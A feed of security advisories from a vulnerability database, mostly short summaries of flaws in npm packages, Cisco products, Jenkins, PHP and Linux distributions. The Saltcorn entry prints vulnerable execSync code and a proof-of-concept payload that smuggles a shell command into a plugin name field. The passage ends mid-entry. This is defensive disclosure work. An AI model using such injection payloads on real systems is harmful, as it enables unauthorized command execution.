01.10.2024 21:10:29 | npm | [NPM:GHSA-QWRQ-VXVW-537R] git-shallow-clone OS Command Injection vulnerability (moderate) | All versions of the package git-shallow-clone are vulnerable to Command injection due to missing sanitization or mitigation flags in the process variable of the gitShallowClone function. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QWRQ-VXVW-537R
01.10.2024 23:43:37 | rustsec | [RUSTSEC-2024-0376] Remotely exploitable Denial of Service in Tonic | ## Impact When using `tonic::transport::Server` there is a remote DoS attack that can cause the server to exit cleanly on accepting a tcp/tls stream. This can be triggered via causing the accept call to error out with errors that were not covered correctly, causing the accept loop to exit. More information can be found [here](https://github.com/hyperium/tonic/issues/1897) ## Patches Upgrading to tonic `0.12.3` and above contains the fix. ## Workarounds A custom accept loop is a possible workaround. | https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0376
01.10.2024 16:26:04 | almalinux | [ALSA-2024:7349] grafana security update (moderate) | grafana security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7349
02.10.2024 00:22:35 | pypi | [PYSEC-2024-99] openslides vulnerability | OpenSlides 4.0.15 was discovered to be using a weak hashing algorithm to store passwords. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-99
03.10.2024 13:48:38 | ubuntu | [USN-7021-4] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-4
03.10.2024 08:14:22 | ubuntu | [USN-7052-1] GNOME Shell vulnerabilities | Several security issues were fixed in GNOME Shell. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7052-1
03.10.2024 04:58:14 | fedora | [FEDORA-2024-5f39927e90] Fedora 40: firefox | New upstream builds (131.0) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5f39927e90
03.10.2024 00:41:53 | npm | [NPM:GHSA-4XQV-47RM-37MM] OpenC3 stores passwords in clear text (`GHSL-2024-129`) (moderate) | ### Summary OpenC3 COSMOS stores the password of a user unencrypted in the LocalStorage of a web browser. This makes the user password susceptible to exfiltration via Cross-site scripting (see GHSL-2024-128). Note: This CVE only affects Open Source edition, and not OpenC3 COSMOS Enterprise Edition ### Impact This issue may lead to Information Disclosure. **NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4XQV-47RM-37MM
03.10.2024 00:41:43 | npm | [NPM:GHSA-VFJ8-5PJ7-2F9G] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`) (moderate) | ### Summary The login functionality contains a reflected cross-site scripting (XSS) vulnerability. Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition ### Impact This issue may lead to Remote Code Execution (RCE). **NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VFJ8-5PJ7-2F9G
03.10.2024 00:51:03 | maven | [MAVEN:GHSA-8PJW-FFF6-3MJV] Jenkins OpenId Connect Authentication Plugin lacks issuer claim validation (critical) | Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the `iss` (Issuer) claim of an ID Token during its authentication flow, a value that identifies the Originating Party (IdP). This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins. OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the `iss` (Issuer) claim of an ID Token during its authentication flow when the Issuer is known. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PJW-FFF6-3MJV
03.10.2024 00:50:54 | maven | [MAVEN:GHSA-49HX-9MM2-7675] Jenkins OpenId Connect Authentication Plugin lacks audience claim validation (critical) | Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the `aud` (Audience) claim of an ID Token during its authentication flow, a value to verify the token is issued for the correct client. This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins. OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the `aud` (Audience) claim of an ID Token during its authentication flow. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-49HX-9MM2-7675
03.10.2024 00:50:29maven[MAVEN:GHSA-PJ95-PH4Q-4QM4] Jenkins exposes multi-line secrets through error messages (moderate)Jenkins Jenkins provides the `secretTextarea` form field for multi-line secrets.Jenkins 2.478 and earlier, LTS 2.462.2 and earlier does not redact multi-line secret values in error messages generated for form submissions involving the `secretTextarea` form field.This can result in exposure of multi-line secrets through those error messages, e.g., in the system log.Jenkins 2.479, LTS 2.462.3 redacts multi-line secret values in error messages generated for form submissions involving the `secretTextarea` form field.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PJ95-PH4Q-4QM4
03.10.2024 00:50:49maven[MAVEN:GHSA-62JV-J4W7-5HH8] Jenkins Credentials plugin reveals encrypted values of credentials to users with Extended Read permission (moderate)Jenkins Credentials Plugin 1380.va_435002fa_924 and earlier, except 1371.1373.v4eb_fa_b_7161e9, does not redact encrypted values of credentials using the `SecretBytes` type (e.g., Certificate credentials, or Secret file credentials from Plain Credentials Plugin) when accessing item `config.xml` via REST API or CLI.This allows attackers with Item/Extended Read permission to view encrypted `SecretBytes` values in credentials.This issue is similar to SECURITY-266 in the 2016-05-11 security advisory, which applied to the `Secret` type used for inline secrets and some credentials types.Credentials Plugin 1381.v2c3a_12074da_b_ redacts the encrypted values of credentials using the `SecretBytes` type in item `config.xml` files.This fix is only effective on Jenkins 2.479 and newer, LTS 2.462.3 and newer. While Credentials Plugin 1381.v2c3a_12074da_b_ can be installed on Jenkins 2.463 through 2.478 (both inclusive), encrypted values of credentials using the `SecretBytes` type will not be redacted when accessing item `config.xml` via REST API or CLI.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-62JV-J4W7-5HH8
03.10.2024 00:50:44maven[MAVEN:GHSA-F9QJ-77Q2-H5C5] Jenkins item creation restriction bypass vulnerability (moderate)Jenkins provides APIs for fine-grained control of item creation:- Authorization strategies can prohibit the creation of items of a given type in a given item group (`ACL#hasCreatePermission2`).- Item types can prohibit creation of new instances in a given item group (`TopLevelItemDescriptor#isApplicableIn(ItemGroup)`).If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.478 and earlier, LTS 2.462.2 and earlier creates the item in memory, only deleting it from disk.This allows attackers with Item/Create permission to bypass these restrictions, creating a temporary item. With Item/Configure permission, they can also save the item to persist it.If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.479, LTS 2.462.3 does not retain the item in memory.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F9QJ-77Q2-H5C5
02.10.2024 19:00:00 | cisco | [CISCO-SA-NDHS-UAAPI-JH4V6ZPN] Cisco Nexus Dashboard and Nexus Dashboard Fabric Controller Unauthorized REST API Vulnerabilities (medium)
Multiple vulnerabilities in the REST APIs of Cisco Nexus Dashboard and Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, low-privileged, remote attacker to perform a limited set of network-admin functions on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDHS-UAAPI-JH4V6ZPN

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDHS-IDV-BK8VQEDC] Cisco Nexus Dashboard Hosted Services Information Disclosure Vulnerabilities (medium)
Multiple vulnerabilities in the logging functions of Cisco Nexus Dashboard Fabric Controller (NDFC), Cisco Nexus Dashboard Insights, and Cisco Nexus Dashboard Orchestrator (NDO) could allow an attacker with access to a tech support file to view sensitive information. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDHS-IDV-BK8VQEDC

02.10.2024 19:00:00 | cisco | [CISCO-SA-SB-RV04X_RV32X_VULNS-YJ2OSDHV] Cisco Small Business RV042, RV042G, RV320, and RV325 Routers Denial of Service and Remote Code Execution Vulnerabilities (medium)
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV042, RV042G, RV320, and RV325 Routers could allow a remote attacker to execute arbitrary commands on the underlying operating system of an affected device or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has not released and will not release software updates that address these vulnerabilities because the affected products are past their respective dates for End of Software Maintenance Releases. The Cisco Product Security Incident Response Team (PSIRT) will continue to evaluate and disclose security vulnerabilities that affect these products until they reach their respective Last Dates of Support. There are no workarounds that address these vulnerabilities.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-RV04X_RV32X_VULNS-YJ2OSDHV

02.10.2024 19:00:00 | cisco | [CISCO-SA-RV34X-PRIVESC-RCE-QE33TCMS] Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Privilege Escalation and Remote Command Execution Vulnerabilities (high)
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to elevate privileges and execute arbitrary commands on the underlying operating system of an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has not released and will not release software updates that address these vulnerabilities because the affected products are past their respective dates for End of Software Maintenance Releases. The Cisco Product Security Incident Response Team (PSIRT) will continue to evaluate and disclose security vulnerabilities that affect these products until they reach their respective Last Dates of Support. There are no workarounds that address these vulnerabilities.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RV34X-PRIVESC-RCE-QE33TCMS

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDO-TLSVLD-FDUF3CPW] Cisco Nexus Dashboard Orchestrator SSL/TLS Certificate Validation Vulnerability (medium)
A vulnerability in the SSL/TLS implementation of Cisco Nexus Dashboard Orchestrator (NDO) could allow an unauthenticated, remote attacker to intercept sensitive information from an affected device. This vulnerability exists because the Cisco NDO Validate Peer Certificate site management feature validates the certificates for Cisco Application Policy Infrastructure Controller (APIC), Cisco Cloud Network Controller (CNC), and Cisco Nexus Dashboard only when a new site is added or an existing one is reregistered. An attacker could exploit this vulnerability by using machine-in-the-middle techniques to intercept the traffic between the affected device and Cisco NDO and then using a crafted certificate to impersonate the affected device. A successful exploit could allow the attacker to learn sensitive information during communications between these devices. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDO-TLSVLD-FDUF3CPW

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDFC-RACI-T46K3JNN] Cisco Nexus Dashboard Fabric Controller REST API Command Injection Vulnerability (medium)
A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC), formerly Cisco Data Center Network Manager (DCNM), could allow an authenticated, remote attacker with network-admin privileges to perform a command injection attack against an affected device. This vulnerability is due to insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted command arguments to a specific REST API endpoint. A successful exploit could allow the attacker to overwrite sensitive files or crash a specific container, which would restart on its own, causing a low-impact denial of service (DoS) condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-RACI-T46K3JNN

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDFC-PTRCE-BUSHLBP] Cisco Nexus Dashboard Fabric Controller Remote Code Execution Vulnerability (high)
A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with low privileges to execute arbitrary code on an affected device. This vulnerability is due to improper path validation. An attacker could exploit this vulnerability by using the Secure Copy Protocol (SCP) to upload malicious code to an affected device using path traversal techniques. A successful exploit could allow the attacker to execute arbitrary code in a specific container with the privileges of root. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-PTRCE-BUSHLBP

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDFC-CMDINJ-UVYZRKFR] Cisco Nexus Dashboard Fabric Controller Arbitrary Command Execution Vulnerability (critical)
A vulnerability in the REST API and web UI of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, low-privileged, remote attacker to perform a command injection attack against an affected device. This vulnerability is due to improper user authorization and insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted commands to an affected REST API endpoint or through the web UI. A successful exploit could allow the attacker to execute arbitrary commands on the CLI of a Cisco NDFC-managed device with network-admin privileges. Note: This vulnerability does not affect Cisco NDFC when it is configured for storage area network (SAN) controller deployment. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-CMDINJ-UVYZRKFR

02.10.2024 19:00:00 | cisco | [CISCO-SA-NDFC-CIDV-XVYX2WLJ] Cisco Nexus Dashboard Fabric Controller Configuration Backup Information Disclosure Vulnerability (medium)
A vulnerability in the Cisco Nexus Dashboard Fabric Controller (NDFC) software, formerly Cisco Data Center Network Manager (DCNM), could allow an attacker with access to a backup file to view sensitive information. This vulnerability is due to the improper storage of sensitive information within config only and full backup files. An attacker could exploit this vulnerability by parsing the contents of a backup file that is generated from an affected device. A successful exploit could allow the attacker to access sensitive information, including NDFC-connected device credentials, the NDFC site manager private key, and the scheduled backup file encryption key. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-CIDV-XVYX2WLJ

02.10.2024 19:00:00 | cisco | [CISCO-SA-MERAKI-MX-VPN-DOS-BY-QWUKQV7X] Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Session Takeover and Denial of Service Vulnerability (medium)
A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to hijack an AnyConnect VPN session or cause a denial of service (DoS) condition for individual users of the AnyConnect VPN service on an affected device. This vulnerability is due to weak entropy for handlers that are used during the VPN authentication process as well as a race condition that exists in the same process. An attacker could exploit this vulnerability by correctly guessing an authentication handler and then sending crafted HTTPS requests to an affected device. A successful exploit could allow the attacker to take over the AnyConnect VPN session from a target user or prevent the target user from establishing an AnyConnect VPN session with the affected device. Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-MX-VPN-DOS-BY-QWUKQV7X

02.10.2024 19:00:00 | cisco | [CISCO-SA-MERAKI-MX-VPN-DOS-QTRHZG2] Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities (high)
Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition to the AnyConnect VPN service on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco Meraki has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-MX-VPN-DOS-QTRHZG2

02.10.2024 19:00:00 | cisco | [CISCO-SA-ISE-INFO-DISC-ZYF2NEEX] Cisco Identity Services Engine Information Disclosure Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device. This vulnerability is due to a lack of proper data protection mechanisms for certain configuration settings. An attacker with Read-Only Administrator privileges could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to view device credentials that are normally not visible to Read-Only Administrators. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INFO-DISC-ZYF2NEEX

02.10.2024 19:00:00 | cisco | [CISCO-SA-EXPW-ESCALATION-3BKZ77BD] Cisco Expressway Series Privilege Escalation Vulnerability (medium)
A vulnerability in the restricted shell of Cisco Expressway Series could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have Administrator-level credentials with read-write privileges on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a series of crafted CLI commands. A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of the affected device. Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPW-ESCALATION-3BKZ77BD

02.10.2024 19:00:00 | cisco | [CISCO-SA-CIMC-REDFISH-COMINJ-SBKV5ZZ] Cisco UCS B-Series, Managed C-Series, and X-Series Servers Redfish API Command Injection Vulnerability (medium)
A vulnerability in the Redfish API of Cisco UCS B-Series, Cisco UCS Managed C-Series, and Cisco UCS X-Series Servers could allow an authenticated, remote attacker with administrative privileges to perform command injection attacks on an affected system and elevate privileges to root. This vulnerability is due to insufficient input validation. An attacker with administrative privileges could exploit this vulnerability by sending crafted commands through the Redfish API on an affected device. A successful exploit could allow the attacker to elevate privileges to root. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-REDFISH-COMINJ-SBKV5ZZ

02.10.2024 18:11:47 | suse | [SUSE-SU-2024:3158-2] Security update for postgresql16 (important)
Security update for postgresql16
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3158-2

02.10.2024 18:11:47 | suse | [SUSE-SU-2024:3158-3] Security update for postgresql16 (important)
Security update for postgresql16
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3158-3

02.10.2024 18:03:41 | suse | [SUSE-SU-2024:3459-1] Security update for kubernetes1.24 (important)
Security update for kubernetes1.24
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3459-1

02.10.2024 16:43:16 | suse | [SUSE-SU-2024:3457-1] Security update for kubernetes1.25 (important)
Security update for kubernetes1.25
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3457-1

02.10.2024 16:40:24 | suse | [SUSE-SU-2024:3456-1] Security update for kubernetes1.26 (important)
Security update for kubernetes1.26
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3456-1

02.10.2024 16:39:42 | suse | [SUSE-SU-2024:3455-1] Security update for kubernetes1.27 (important)
Security update for kubernetes1.27
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3455-1

02.10.2024 16:38:56 | suse | [SUSE-SU-2024:3454-1] Security update for kubernetes1.28 (important)
Security update for kubernetes1.28
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3454-1

02.10.2024 14:03:35 | suse | [SUSE-SU-2024:3510-1] Security update for tomcat (important)
Security update for tomcat
Link: https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3510-1

02.10.2024 06:58:22 | ubuntu | [USN-7051-1] AsyncSSH vulnerability
A protocol flaw was fixed in AsyncSSH.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7051-1

02.10.2024 05:59:01 | fedora | [FEDORA-2024-2b429e720e] Fedora 40: php (critical)
PHP version 8.3.12 (26 Sep 2024)
CGI:
- Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter Injection Vulnerability). (CVE-2024-8926) (nielsdos)
- Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassable due to the environment variable collision). (CVE-2024-8927) (nielsdos)
Core:
- Fixed bug GH-15408 (MSan false-positive on zend_max_execution_timer). (zeriyoshi)
- Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot)
- Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot)
- Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEM not found). (nielsdos)
- Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, Thomas Petazzoni)
- Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud)
- Fixed uninitialized lineno in constant AST of internal enums. (ilutov)
Curl:
- Fixed bug GH-15547 (curl_multi_select overflow on timeout argument). (David Carlier)
DOM:
- Fixed bug GH-15551 (Segmentation fault (access null pointer) in ext/dom/xml_common.h). (nielsdos)
- Fixed bug GH-15654 (Signed integer overflow in ext/dom/nodelist.c). (nielsdos)
Fileinfo:
- Fixed bug GH-15752 (Incorrect error message for finfo_file with an empty filename argument). (DanielEScherzer)
FPM:
- Fixed bug GHSA-865w-9rf3-2wh5 (Logs from children may be altered). (CVE-2024-9026) (Jakub Zelenka)
MySQLnd:
- Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, Kamil Tekiela)
Opcache:
- Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c). (nielsdos)
- Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos)
SAPI:
- Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data). (CVE-2024-8925) (Arnaud)
Standard:
- Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb)
Streams:
- Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb)
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2b429e720e

03.10.2024 03:06:54 | rubysec | [RUBYSEC:DECIDIM-2024-41673] Decidim has a cross-site scripting vulnerability in the version control page (high)
### Impact
The version control feature used in resources is subject to potential cross-site scripting (XSS) attack through a malformed URL.
### Workarounds
Not available
### References
OWASP ASVS v4.0.3-5.1.3
### Credits
This issue was discovered in a security audit organized by [Open Source Politics](https://opensourcepolitics.eu/) against Decidim done during July 2025.
Link: https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-41673

02.10.2024 17:58:53 | rustsec | [RUSTSEC-2024-0376] Remotely exploitable Denial of Service in Tonic
## Impact
When using `tonic::transport::Server` there is a remote DoS attack that can cause the server to exit cleanly on accepting a tcp/tls stream. This can be triggered by causing the accept call to error out with errors that were not covered correctly, causing the accept loop to exit. More information can be found [here](https://github.com/hyperium/tonic/issues/1897)
## Patches
Upgrading to tonic `0.12.3` and above contains the fix.
## Workarounds
A custom accept loop is a possible workaround.
Link: https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0376

04.10.2024 04:51:12 | fedora | [FEDORA-2024-7c800c4df7] Fedora 39: php (critical)
PHP version 8.2.24 (26 Sep 2024)
CGI:
- Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter Injection Vulnerability). (CVE-2024-8926) (nielsdos)
- Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassable due to the environment variable collision). (CVE-2024-8927) (nielsdos)
Core:
- Fixed bug GH-15408 (MSan false-positive on zend_max_execution_timer). (zeriyoshi)
- Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot)
- Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot)
- Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEM not found). (nielsdos)
- Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, Thomas Petazzoni)
- Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud)
- Fixed uninitialized lineno in constant AST of internal enums. (ilutov)
Curl:
- Fixed bug GH-15547 (curl_multi_select overflow on timeout argument). (David Carlier)
DOM:
- Fixed bug GH-15551 (Segmentation fault (access null pointer) in ext/dom/xml_common.h). (nielsdos)
Fileinfo:
- Fixed bug GH-15752 (Incorrect error message for finfo_file with an empty filename argument). (DanielEScherzer)
FPM:
- Fixed bug GHSA-865w-9rf3-2wh5 (Logs from children may be altered). (CVE-2024-9026) (Jakub Zelenka)
MySQLnd:
- Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, Kamil Tekiela)
Opcache:
- Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c). (nielsdos)
- Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos)
SAPI:
- Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data). (CVE-2024-8925) (Arnaud)
SOAP:
- Fixed bug php#73182 (PHP SOAPClient does not support stream context HTTP headers in array form). (nielsdos)
Standard:
- Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb)
Streams:
- Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb)
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7c800c4df7

04.10.2024 04:47:10 | fedora | [FEDORA-2024-126d22c121] Fedora 40: pgadmin4 (critical)
Fix CVE-2024-9014.
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-126d22c121

04.10.2024 03:17:02 | fedora | [FEDORA-2024-1d8785c391] Fedora 41: firefox
New upstream builds (131.0)
Link: https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d8785c391

04.10.2024 01:21:26 | npm | [NPM:GHSA-FM76-W8JW-XF8M] @saltcorn/plugins-loader unsanitized plugin name leads to a remote code execution (RCE) vulnerability when creating plugins using git source (high)
### Summary
When creating a new plugin using the `git` source, the user-controlled value `req.body.name` is used to build the plugin directory where the location will be cloned. The API used to execute the `git clone` command with the user-controlled data is `child_process.execSync`. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.
### Details
Relevant code from source (`req.body`) to sink (`child_process.execSync`).
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400
```js
router.post(
  "/",
  isAdmin,
  error_catcher(async (req, res) => {
    const plugin = new Plugin(req.body); // [1]
    [...]
    try {
      await load_plugins.loadAndSaveNewPlugin( // [3]
        plugin,
        schema === db.connectObj.default_schema || plugin.source === "github"
      );
      [...]
    }
  })
);
```
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44
```js
class Plugin {
  [...]
  constructor(o: PluginCfg | PluginPack | Plugin) {
    [...]
    this.name = o.name; // [2]
    [...]
}
```
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65
```js
const loadAndSaveNewPlugin = async (plugin, force, noSignalOrDB) => {
  [...]
  const loader = new PluginInstaller(plugin); // [4]
  const res = await loader.install(force); // [7]
  [...]
};
```
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61
```js
class PluginInstaller {
  constructor(plugin, opts = {}) {
    [...]
    const tokens =
      plugin.source === "npm"
        ? plugin.location.split("/")
        : plugin.name.split("/"); // [5]
    [...]
    this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [6]
    [...]
  }

  async install(force) {
    [...]
    if (await this.prepPluginsFolder(force, pckJSON)) { // [8]
    [...]
  }

  async prepPluginsFolder(force, pckJSON) {
    [...]
    switch (this.plugin.source) {
      [...]
      case "git":
        if (force || !(await pathExists(this.pluginDir))) {
          await gitPullOrClone(this.plugin, this.tempDir); // [9]
        [...]
}
```
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112
```js
const gitPullOrClone = async (plugin, pluginDir) => {
  [...]
  if (fs.existsSync(pluginDir)) {
    execSync(`git ${setKey} -C ${pluginDir} pull`);
  } else {
    execSync(`git ${setKey} clone ${plugin.location} ${pluginDir}`); // [10]
  }
  [...]
};
```
### PoC
- check that the file that will be created by the command `echo "hello">/tmp/HACKED` does not exist:
```
cat /tmp/HACKED
cat: /tmp/HACKED: No such file or directory
```
- login with an admin account
- visit `http://localhost:3000/plugins/new`
- enter the following fields:
  - Name: `;echo "hello">/tmp/HACKED`
  - Source: `git`
  - other fields blank
- click `Create`
- you will get an error saying `ENOENT: no such file or directory, ....` but the command `echo "hello">/tmp/HACKED` will be executed
- to verify:
```
cat /tmp/HACKED
hello
```
### Impact
Remote code execution
### Recommended Mitigation
Sanitize the `pluginDir` value before passing it to `execSync`. Alternatively, use the `child_process.execFileSync` API (docs: https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options)
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FM76-W8JW-XF8M

03.10.2024 22:51:00 | npm | [NPM:GHSA-78P3-FWCQ-62C2] @saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting localizer strings (high)
### Summary
The endpoint `/site-structure/localizer/save-string/:lang/:defstring` accepts two parameter values: `lang` and `defstring`. These values are used in an unsafe way to set the keys and value of the `cfgStrings` object. It allows adding/modifying properties of the `Object prototype`, which results in several logic issues, including:
- RCE vulnerabilities by polluting the `tempRootFolder` property
- SQL injection vulnerabilities by polluting the `schema` property when using the `PostgreSQL` database.
### Details
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239
```js
router.post(
